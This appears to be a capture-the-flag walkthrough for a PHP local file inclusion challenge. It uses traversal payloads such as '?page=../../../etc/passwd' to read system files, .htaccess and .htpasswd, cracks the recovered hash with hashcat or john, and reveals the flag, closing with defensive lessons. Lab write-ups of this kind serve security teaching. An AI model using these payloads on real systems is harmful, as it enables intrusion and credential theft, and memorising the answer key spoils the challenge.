1. Access the corporate website at
2. Explore the website structure and identify potential vulnerable parameters
3. Look for any include or file inclusion functionality
4. Check for common vulnerable parameters like 'page', 'file', 'include', etc.

1. Navigate to the 'About' page and observe the URL structure
2. Notice the URL contains a parameter like: ?page=about
3. Test for directory traversal by modifying the parameter
4. Try accessing: ?page=../../../etc/passwd to test for LFI (note: this will work because the else clause doesn't append .php)
5. If successful, you'll see system file contents

1. Use the include vulnerability to read the .htaccess file
2. Navigate to: ?page=admin/.htaccess
3. This will display the .htaccess file contents
4. Look for authentication directives and password files
5. You should see something like:
   

   AuthType Basic
   AuthName "Admin Area"
   AuthUserFile /var/www/html/admin/.htpasswd
   Require valid-user

1. Now read the .htpasswd file using the same vulnerability
2. Navigate to: ?page=admin/.htpasswd
3. This will display the password hash
4. You should see something like:
   

   admin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/

5. Copy the hash for cracking

1. Use a password cracking tool like hashcat or john the ripper
2. Installing hashcat:
   

   # Ubuntu/Debian:
   sudo apt-get install hashcat
   
   # macOS (with Homebrew):
   brew install hashcat
   
   # Windows:
   # Download from https://hashcat.net/hashcat/

3. Installing john the ripper:
   

   # Ubuntu/Debian:
   sudo apt-get install john
   
   # macOS (with Homebrew):
   brew install john
   
   # Windows:
   # Download from https://www.openwall.com/john/

4. Using hashcat:
   

   # Create a file with the hash
   echo "admin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/" > hash.txt
   
   # Use hashcat with Apache MD5 mode (-m 1600)
   hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
   
   # Or with a smaller wordlist for testing
   hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/common_passwords.txt

5. Using john the ripper:
   

   # Create a file with the hash
   echo "admin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/" > hash.txt
   
   # Use john with wordlist
   john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
   
   # Or with a smaller wordlist for testing
   john --wordlist=/usr/share/wordlists/common_passwords.txt hash.txt

6. Alternative: Online hash cracking
   

   # You can also use online tools like crackstation.net
   # Just paste the hash: $apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/

7. Common wordlists to try: rockyou.txt, common_passwords.txt, passwords.txt
8. For this challenge, the password is a common corporate password
9. Important: The flag is the password you crack, not something you find in the admin panel!

1. Once you successfully crack the password hash, you have the flag!
2. The flag is the password you cracked: password123
3. No need to access the admin panel - the password itself is the flag
4. Submit the password as your flag

• PHP Include Vulnerabilities: Occur when user input is directly included in file operations without proper validation
• Directory Traversal: Allows attackers to access files outside the intended directory
• .htaccess Protection: While useful, can be bypassed if the application has other vulnerabilities
• Password Hash Cracking: Demonstrates the importance of strong passwords and proper hash storage
• Defense in Depth: Multiple security layers are needed to protect sensitive areas

• Input Validation: Always validate and sanitize user input
• Whitelist Approach: Only allow specific files to be included
• Path Validation: Ensure included files are within allowed directories
• Strong Authentication: Use strong passwords and consider multi-factor authentication
• Security Headers: Implement proper security headers and access controls
• Regular Audits: Conduct regular security assessments

The flag is: password123

• Understanding PHP include vulnerabilities and their exploitation
• Learning about .htaccess authentication bypass techniques
• Practicing password hash cracking methodologies
• Developing web application security testing skills
• Understanding defense in depth and security layers